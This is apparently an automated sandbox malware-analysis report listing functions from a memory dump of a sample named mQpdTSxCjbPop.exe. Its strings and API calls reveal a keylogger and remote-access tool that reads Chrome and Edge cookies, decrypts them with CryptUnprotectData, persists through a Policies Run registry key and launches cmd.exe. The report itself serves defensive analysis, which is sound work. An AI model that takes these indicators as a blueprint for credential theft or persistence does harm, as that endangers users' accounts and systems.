Opcode Fuzzy Hash: c3905e8113842b235930180e7962ad7fd0473fd9621d9de76edd9e6bfbddcfc2
Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A

Uniqueness

Uniqueness Score: -1.00%

Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3

Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0

Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

NG, xrefs: 00409F33
XQG, xrefs: 00409F48
PG, xrefs: 00409EFE

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CreateFileKeyboardLayoutNameconnectsend
String ID: XQG$NG$PG
API String ID: 1634807452-3565412412
Opcode ID: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
Opcode Fuzzy Hash: 54480eb0bc649cc79f0ae2d6016b7d596c1c2f6fed1d275c9adea3c12e8bc9d3
Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649

Uniqueness

Uniqueness Score: -1.00%

Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3

Strings

`#D, xrefs: 004424ED
`#D, xrefs: 00442400

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: `#D$`#D
API String ID: 885266447-2450397995
Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe,00000104), ref: 00443475
_free.LIBCMT ref: 00443540
_free.LIBCMT ref: 0044354A

Strings

C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe, xrefs: 0044346C, 00443473, 004434A2, 004434DA

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe
API String ID: 2506810119-1253301118
Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0044B81F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,FF8BC35D,00000000,?,PkGNG,0044BB7E,?,00000000,FF8BC35D), ref: 0044B8D2
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0044B900
GetLastError.KERNEL32 ref: 0044B931

Strings

PkGNG, xrefs: 0044B821

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: PkGNG
API String ID: 2456169464-263838557
Opcode ID: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction ID: a4f89274a665815b2d7bd0a52cbb4c71b9b2878c435ac706d73e761117ab6cd9
Opcode Fuzzy Hash: f29f19b57bd44476b84c2158df793cbd226619e25f42890a5cb9caccfef44ccc
Instruction Fuzzy Hash: 18317271A002199FDB14DF59DC809EAB7B8EB48305F0444BEE90AD7260DB34ED80CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2
0NG, xrefs: 00404097

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "$0NG
API String ID: 368326130-3219657780
Opcode ID: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: 074ad0252c5f85a0395eaa63b88ebd601cb6552471d06d252c91316da9998368
Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 004162F5

Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
Part of subcall function 00413877: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138A0
Part of subcall function 00413877: RegCloseKey.ADVAPI32(004660A4,?,?,?,0040C152,00466C48,00000001,000000AF,004660A4), ref: 004138AB

Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD

Strings

PG, xrefs: 00416322
okmode, xrefs: 0041630F
!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: _wcslen$CloseCreateValue
String ID: !D@$okmode$PG
API String ID: 3411444782-3370592832
Opcode ID: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
Opcode Fuzzy Hash: 3229767f42b224c22e38ab05f87ced9dbd25ea478007aec8b0515c8cef1bdfe3
Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C4F6

PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C688

Strings

User Data\Default\Network\Cookies, xrefs: 0040C603
User Data\Profile ?\Network\Cookies, xrefs: 0040C635

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
Opcode Fuzzy Hash: ec0199523fc237e56364718817167f2e0688e89b82cc13cff5a9b1f21d5ed8d2
Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559

PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C757

Strings

User Data\Default\Network\Cookies, xrefs: 0040C6D2
User Data\Profile ?\Network\Cookies, xrefs: 0040C704

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
API String ID: 1174141254-1980882731
Opcode ID: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
Opcode Fuzzy Hash: 830e565da1f4430f56a3fad2b3585c60fae3d202001501423d8e3de01861922a
Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040A179 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,0040A27D,004750F0,00000000,00000000), ref: 0040A1FE
CreateThread.KERNEL32(00000000,00000000,0040A267,004750F0,00000000,00000000), ref: 0040A20E
CreateThread.KERNEL32(00000000,00000000,0040A289,004750F0,00000000,00000000), ref: 0040A21A

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Strings

Offline Keylogger Started, xrefs: 0040A19B, 0040A1A2, 0040A1CF

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
Opcode Fuzzy Hash: 739852a997fc0ae6182b294a28b4bb93c4a2cbea1e12e060c92b97aef043fd25
Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB

Uniqueness

Uniqueness Score: -1.00%

Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509

CreateThread.KERNEL32(00000000,00000000,0040A267,?,00000000,00000000), ref: 0040AF6E
CreateThread.KERNEL32(00000000,00000000,0040A289,?,00000000,00000000), ref: 0040AF7A
CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86

Strings

Online Keylogger Started, xrefs: 0040AF03, 0040AF0C, 0040AF36

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
Opcode Fuzzy Hash: be6d66d5fa79c5f31e74c778d4d5e15bc8bc5d5b3a82591b70bbeab99a5f0c5b
Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB

Uniqueness

Uniqueness Score: -1.00%

Function 0041B4EF Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(00000000), ref: 0041B509

Strings

| , xrefs: 0041B53C
%02i:%02i:%02i:%03i , xrefs: 0041B51E
PkGNG, xrefs: 0041B4EF

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: LocalTime
String ID: | $%02i:%02i:%02i:%03i $PkGNG
API String ID: 481472006-3277280411
Opcode ID: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
Opcode Fuzzy Hash: cd8841d7ce7b31923eb0730a989a812e14017909399abac035ca2ef2887a575a
Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404F81
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0

Strings

KeepAlive | Enabled | Timeout: , xrefs: 00404F94

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: KeepAlive | Enabled | Timeout:
API String ID: 2532271599-1507639952
Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA

Uniqueness

Uniqueness Score: -1.00%

Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
GetProcAddress.KERNEL32(00000000), ref: 00406A89

Strings

CryptUnprotectData, xrefs: 00406A78
crypt32, xrefs: 00406A7D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0044C253 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
GetLastError.KERNEL32 ref: 0044C296
__dosmaperr.LIBCMT ref: 0044C29D

Strings

PkGNG, xrefs: 0044C255

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID: PkGNG
API String ID: 2336955059-263838557
Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64

Uniqueness

Uniqueness Score: -1.00%

Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
CloseHandle.KERNEL32(?), ref: 004051CA
SetEvent.KERNEL32(?), ref: 004051D9

Strings

Connection Timeout, xrefs: 00405198

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E833

Strings

ios_base::failbit set, xrefs: 0040E815
ios_base::eofbit set, xrefs: 0040E822
ios_base::badbit set, xrefs: 0040E7EF

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B

Uniqueness

Uniqueness Score: -1.00%

Function 0041CAE1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
LocalFree.KERNEL32(?,?), ref: 0041CB2F

Strings

@J@, xrefs: 0041CAED
PkGNG, xrefs: 0041CAE1

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: FormatFreeLocalMessage
String ID: @J@$PkGNG
API String ID: 1427518018-1416487119
Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659

Uniqueness

Uniqueness Score: -1.00%

Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,759237E0,?), ref: 0041384D
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,759237E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
API String ID: 1818849710-1051519024
Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0

Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683

__CxxThrowException@8.LIBVCRUNTIME ref: 0040E016

Strings

bad locale name, xrefs: 0040E000

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C

Uniqueness

Uniqueness Score: -1.00%

Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1

Strings

Control Panel\Desktop, xrefs: 00413778, 00413788

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Control Panel\Desktop
API String ID: 1818849710-27424756
Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
ShowWindow.USER32(00000009), ref: 00416C61
SetForegroundWindow.USER32 ref: 00416C6D

Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 0000000C.00000002.2043736617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_mQpdTSxCjbPop.jbxd

Yara matches

Similarity

API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
String ID: !D@
API String ID: 3446828153-604454484
Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D

Uniqueness

Uniqueness Score: -1.00%

Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130

Strings

cmd.exe, xrefs: 00416125
